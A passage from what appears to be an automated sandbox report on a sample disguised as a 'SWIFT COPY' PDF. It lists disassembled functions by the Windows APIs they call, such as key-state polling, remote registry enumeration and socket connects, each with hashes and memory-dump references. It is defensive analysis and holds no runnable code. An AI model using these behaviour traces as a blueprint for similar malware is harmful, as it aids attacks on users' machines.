                                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 009807FB
                                                                                      • Part of subcall function 0093E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0096A574,?,?,00000000,00000008), ref: 0093E675
                                                                                      • Part of subcall function 0093E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0096A574,?,?,00000000,00000008), ref: 0093E699
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327935632-0
                                                                                    • Opcode ID: 5247f0edab226531765875d1f3f7e33291759bab4f23c29c4f8d886de627c9d7
                                                                                    • Instruction ID: e00dbbfb99d907890daaf1d3fe56061f692b5d03af9ac29e75ff278b5711f91c
                                                                                    • Opcode Fuzzy Hash: 5247f0edab226531765875d1f3f7e33291759bab4f23c29c4f8d886de627c9d7
                                                                                    • Instruction Fuzzy Hash: CB515C75A01215DFCB04EFA8D885EADB7B5BF89310F048059E916AB352DB30EE45CF90
                                                                                    Function 00982E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00983C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00982EEF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00982F2E
                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00982F75
                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00982FA1
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00982FAE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3740051246-0
                                                                                    • Opcode ID: bf09a4167860af788e59490f6510a8bbdce7188214fed53f4962dca74d2f9651
                                                                                    • Instruction ID: 99513d7a9025fbf81d331dc156990b946c2d4f95293063e6637707a7f756ffea
                                                                                    • Opcode Fuzzy Hash: bf09a4167860af788e59490f6510a8bbdce7188214fed53f4962dca74d2f9651
                                                                                    • Instruction Fuzzy Hash: 19513871208204AFD704EF64D891F6EB7F9BF88714F04891DF696972A1DB34E905CB52
                                                                                    Function 0098CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8cd4b3f75a273e4f1e11940769cf20f1049971553a213b1f26f1ddc6e8b6a559
                                                                                    • Instruction ID: af0f46fd1405ef58c498a842c26dd9837df734dabab1c351713fdf93fa239489
                                                                                    • Opcode Fuzzy Hash: 8cd4b3f75a273e4f1e11940769cf20f1049971553a213b1f26f1ddc6e8b6a559
                                                                                    • Instruction Fuzzy Hash: E441B4B9905214AFC720FB68CC44FA9BFACEB09310F140565F95AA73E1C734AD41DBA0
                                                                                    Function 00971206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009712B4
                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009712DD
                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0097131C
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00971341
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00971349
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1389676194-0
                                                                                    • Opcode ID: 240d20ee0bd637b59cbe01c3ced2265f43b50a65eab46ea348c131b83690fb7e
                                                                                    • Instruction ID: 4f7e01c4c31970469b3fbf555c85be7752bd69403785349e24a02d29a425430c
                                                                                    • Opcode Fuzzy Hash: 240d20ee0bd637b59cbe01c3ced2265f43b50a65eab46ea348c131b83690fb7e
                                                                                    • Instruction Fuzzy Hash: E6410935A00215DFDF05EF64C981AAEBBF9FF49310B148099E91AAB366CB31ED01DB54
                                                                                    Function 0093B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(000000FF), ref: 0093B64F
                                                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0093B66C
                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 0093B691
                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0093B69F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4210589936-0
                                                                                    • Opcode ID: a9720c1fb92fa9190c211ca106e57ffb52c4b58862a225a6a756a8e9b8ee20e9
                                                                                    • Instruction ID: 0485aba7c50af99c8490c77d779f79c2ecb1f5f1528dacce30281eac90cbeb1a
                                                                                    • Opcode Fuzzy Hash: a9720c1fb92fa9190c211ca106e57ffb52c4b58862a225a6a756a8e9b8ee20e9
                                                                                    • Instruction Fuzzy Hash: 17418E35608109FBDF159F68C885AEDBBB8FF05324F104319F82A92291CB34AD90DFA1
                                                                                    Function 0095B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 0095B369
                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0095B413
                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0095B41B
                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0095B429
                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0095B431
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: fc4a2f6e8bec5cf323ed67d14a4d20db8b6e6007d49f184a18f2aad06d3eee84
                                                                                    • Instruction ID: 45e3c3a04d40dec0e2325708b0b2e430141d25f7459147ac755bf8efb9761f7c
                                                                                    • Opcode Fuzzy Hash: fc4a2f6e8bec5cf323ed67d14a4d20db8b6e6007d49f184a18f2aad06d3eee84
                                                                                    • Instruction Fuzzy Hash: DA31CC71905219EBDF14CFA9DD4DADE3BB9EF0531AF108229F921AA1D1C3B09918DB90
                                                                                    Function 0095DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0095DBD7
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0095DBF4
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0095DC2C
                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0095DC52
                                                                                    • _wcsstr.LIBCMT ref: 0095DC5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                    • String ID:
                                                                                    • API String ID: 3902887630-0
                                                                                    • Opcode ID: fa05036b62b7805dbf1212564aa4ab1b94445b39b94876400a82ae256ee979ad
                                                                                    • Instruction ID: 86e83cc3c3a1a8e46f82f2cd54a365acf57ae01741d48d45365d54235c45f4da
                                                                                    • Opcode Fuzzy Hash: fa05036b62b7805dbf1212564aa4ab1b94445b39b94876400a82ae256ee979ad
                                                                                    • Instruction Fuzzy Hash: 9E21F272209204ABEB259F2ADC49E7B7BACDF85751F104029FC0ACA191EAA5C84597A0
                                                                                    Function 0095BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0095BC90
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0095BCC2
                                                                                    • __itow.LIBCMT ref: 0095BCDA
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0095BD00
                                                                                    • __itow.LIBCMT ref: 0095BD11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: dd3760abb3f286c74b9c60438c99c1aad184df41a227409450d6281326c2ae1c
                                                                                    • Instruction ID: da91d1666726a16328a05204e8f6a65e3e2f814730ff5aed3b22a00b4528bf16
                                                                                    • Opcode Fuzzy Hash: dd3760abb3f286c74b9c60438c99c1aad184df41a227409450d6281326c2ae1c
                                                                                    • Instruction Fuzzy Hash: 6E21C6756002187ADB10EF6A9C46FDE7A7CAF8A711F000025FD46EB1C1EBB0894987E1
                                                                                    Function 00966318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 009250E6: _wcsncpy.LIBCMT ref: 009250FA
                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,009660C3), ref: 00966369
                                                                                    • GetLastError.KERNEL32(?,?,?,009660C3), ref: 00966374
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009660C3), ref: 00966388
                                                                                    • _wcsrchr.LIBCMT ref: 009663AA
                                                                                      • Part of subcall function 00966318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009660C3), ref: 009663E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                    • String ID:
                                                                                    • API String ID: 3633006590-0
                                                                                    • Opcode ID: 8550d3ffa756a3ee27ee3ac06ea26d879c9b7c7e68460bd959684c717ec0088f
                                                                                    • Instruction ID: 32b145a7a15d9ac382b29458c89ad2d2d72b11355fb4abc23c7a3a09ca81e2d1
                                                                                    • Opcode Fuzzy Hash: 8550d3ffa756a3ee27ee3ac06ea26d879c9b7c7e68460bd959684c717ec0088f
                                                                                    • Instruction Fuzzy Hash: 0E213A319192159BDF15AB78AC52FFA33ACEF46360F100466F046D72C0EF70DD809A95
                                                                                    Function 00978B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0097A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0097A84E
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00978BD3
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978BE2
                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00978BFE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 3701255441-0
                                                                                    • Opcode ID: b481d830891762a3d494759c1f56f72114719b11895cafed966b1a15617776c9
                                                                                    • Instruction ID: 608d194cbfa7cb5d700bfa61a49d507f37b4bf801019c785f5bf5e5e9b4bd15f
                                                                                    • Opcode Fuzzy Hash: b481d830891762a3d494759c1f56f72114719b11895cafed966b1a15617776c9
                                                                                    • Instruction Fuzzy Hash: B82190722402149FCB14AF68CC89B7E77ADAF89710F048459F956AB2D2CF74AC018BA1
                                                                                    Function 00978420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00978441
                                                                                    • GetForegroundWindow.USER32 ref: 00978458
                                                                                    • GetDC.USER32(00000000), ref: 00978494
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 009784A0
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 009784DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: cc25e7bc9b97a13a6c83e973433e8c9d7f2ef337655416395adef603c5fee0ec
                                                                                    • Instruction ID: 2d0a79d0952ef69d8fd110efa44c8f3a30b412ec43fac434e6bddd3f6e8dec96
                                                                                    • Opcode Fuzzy Hash: cc25e7bc9b97a13a6c83e973433e8c9d7f2ef337655416395adef603c5fee0ec
                                                                                    • Instruction Fuzzy Hash: 12218176A01204AFD704DFA4D889AAEBBE5EF89301F04C479F85AD7651DB70AD40DBA0
                                                                                    Function 0093AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0093AFE3
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0093AFF2
                                                                                    • BeginPath.GDI32(?), ref: 0093B009
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0093B033
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    • String ID:
                                                                                    • API String ID: 3225163088-0
                                                                                    • Opcode ID: 8bbecdcbe506175bb86d61a4f8b12e62f7f9636566c4b0f0d4e961213b4ccd44
                                                                                    • Instruction ID: 95089b2a2dcdb924684354cd80ee38a8ab056dceb6eefbc80faeb3d5674a6283
                                                                                    • Opcode Fuzzy Hash: 8bbecdcbe506175bb86d61a4f8b12e62f7f9636566c4b0f0d4e961213b4ccd44
                                                                                    • Instruction Fuzzy Hash: 5521D4B0828385EFDB14DF54EC8879E7B6CBB11755F14431AF5259A1A0C3705D81EF91
                                                                                    Function 0094217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __calloc_crt.LIBCMT ref: 009421A9
                                                                                    • CreateThread.KERNEL32(?,?,009422DF,00000000,?,?), ref: 009421ED
                                                                                    • GetLastError.KERNEL32 ref: 009421F7
                                                                                    • _free.LIBCMT ref: 00942200
                                                                                    • __dosmaperr.LIBCMT ref: 0094220B
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                    • String ID:
                                                                                    • API String ID: 2664167353-0
                                                                                    • Opcode ID: 2d267c2525234a19a659cc6d1b0d1a86d95d64cf8d856d9c8078df071e2edb2b
                                                                                    • Instruction ID: 79180475661100c8365494ec96bad1c6b6e79980247415cffa601c59f7e88533
                                                                                    • Opcode Fuzzy Hash: 2d267c2525234a19a659cc6d1b0d1a86d95d64cf8d856d9c8078df071e2edb2b
                                                                                    • Instruction Fuzzy Hash: 3411043210834AAF9F15AFA4DC41EAB7B99FF85774B100429F92486181EBB1D81186A1
                                                                                    Function 0095ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0095ABD7
                                                                                    • GetLastError.KERNEL32(?,0095A69F,?,?,?), ref: 0095ABE1
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0095A69F,?,?,?), ref: 0095ABF0
                                                                                    • HeapAlloc.KERNEL32(00000000,?,0095A69F,?,?,?), ref: 0095ABF7
                                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0095AC0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: 4126678505524ccca276057de372bfb40507ff0d79a10e17fac37ed6423eccff
                                                                                    • Instruction ID: 9b97e5f3c2f494853c1d0880667a2379f3c34799f0cb2f5979ffa5d07cadb2a8
                                                                                    • Opcode Fuzzy Hash: 4126678505524ccca276057de372bfb40507ff0d79a10e17fac37ed6423eccff
                                                                                    • Instruction Fuzzy Hash: 99018C70215204BFDB108FAADC48DAB3BACEF8A355B100529F846C3260DA71CC44DBA4
                                                                                    Function 00959ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32 ref: 00959ADC
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 00959AF7
                                                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00959B05
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00959B15
                                                                                    • CLSIDFromString.OLE32(?,?), ref: 00959B21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
